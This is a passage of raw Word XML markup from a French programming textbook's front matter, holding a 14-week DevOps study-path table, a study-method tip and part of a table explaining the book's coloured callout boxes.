          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>54 à 61</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réseaux, HTTP, TLS, serveurs web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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62 à 68</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Conteneurs et Kubernetes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>69 à 84</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cloud, IaC, CI/CD et GitOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Parcours C — Devenir ingénieur DevOps (14 semaines)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce parcours suppose une aisance de base avec un terminal et un langage de programmation. Il suit le cours 2, en s'appuyant sur les chapitres web pour les applications déployées.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144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Semaines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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Chapitres</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Objectif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1–2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>46 à 53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Culture DevOps, Linux, terminal, Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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3–4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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54 à 61</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Réseaux, DNS, HTTP, TLS, serveurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>62 à 68</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Docker, images, Compose, Kubernetes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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6–7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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69 à 77</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Cloud, serverless, Terraform, Ansible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>8–9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>78 à 84</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CI/CD, publications, GitOps, secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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10–11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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85 à 92</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Messagerie, charge, reprise, coûts, sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>93</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Projet final de bout en bout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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révisions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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Observabilité, SRE, synthèse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1442"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>entretien</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4687"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Portfolio, entretien technique, spécialisation</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RÈGLE DES TROIS PASSAGES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Pour chaque chapitre : lisez une première fois sans coder pour saisir le modèle mental ; reprenez ensuite les exemples au clavier ; terminez par les exercices sans regarder le corrigé. La mémoire motrice du code ne s'acquiert qu'en écrivant.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>Conventions, pictogrammes et sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cette page récapitule les repères visuels utilisés dans le volume et précise la provenance des contenus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Les six encadrés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187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Encadré</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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Couleur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="510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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Définition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Gris bleuté</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Terme technique introduit pour la première fois</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="187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Objectifs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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Sable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="510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Compétences visées par le chapitre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Méthode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Démarche, ordre des opérations, règle de travail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="187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Bonne pratique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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Vert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="510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Ce qu'il faut faire, et pourquoi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rouge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Risque, erreur fréquente, sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
